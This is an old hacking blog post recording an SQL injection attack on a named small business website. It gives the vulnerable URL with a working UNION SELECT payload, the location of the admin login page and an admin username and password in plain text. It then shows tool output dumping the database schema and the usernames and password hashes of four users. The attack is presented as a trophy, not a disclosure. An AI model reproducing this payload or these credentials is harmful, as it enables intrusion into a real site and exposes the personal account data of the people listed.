viperfx07 is here to blog about hacking, cracking, website, application, android, and many more.

Monday, October 13, 2008

[SQLi] http://www.wiyoko.com

12:22 AM Posted by viperfx07 No comments


Tool --> schemafuzz.py v5.0
Admin loc --> http://wiyoko.com/admin/index.php
Admin usr:pwd --> admin:1111 (see others in the dump or above pic)
Dump:
[+] URL:http://wiyoko.com/detailnews.php?table=news&id=32+AND+1=2+UNION+SELECT+0,sqli,2,3,4--
[+] Evasion Used: "+" "--"
[+] 19:54:01
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: t61647_wiyoko
User: t61647_wiyoko@localhost
Version: 5.0.32-Debian_7etch6

[Database]: t61647_wiyoko
[Table: Columns]
[0]additional: id,title,description,date,image
[1]main: id,title,description,date,image
[2]news: id,title,description,date,image
[3]products: id,title,description,date,image
[4]user: id,name,username,password,date,status

[-] [19:54:16]
[-] Total URL Requests 28
[-] Done


[+] URL:http://wiyoko.com/detailnews.php?table=news&id=32+AND+1=2+UNION+SELECT+0,sqli,2,3,4--
[+] Evasion Used: "+" "--"
[+] 19:56:04
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: t61647_wiyoko
User: t61647_wiyoko@localhost
Version: 5.0.32-Debian_7etch6
[+] Dumping data from database "t61647_wiyoko" Table "user"
[+] Column(s) ['username', 'password']
[+] Number of Rows: 4

[0] mondro:b59c67bf196a4758191e42f76670ceba:
[1] heri:b59c67bf196a4758191e42f76670ceba:
[2] admin:b59c67bf196a4758191e42f76670ceba:
[3] Meiga Pra:cd166cb83d8c0c9739e48e1ff27ae193:cd166cb83d8c0c9739e48e1ff27ae193:

[-] [19:56:07]
[-] Total URL Requests 6
[-] Done

0 comments:

Post a Comment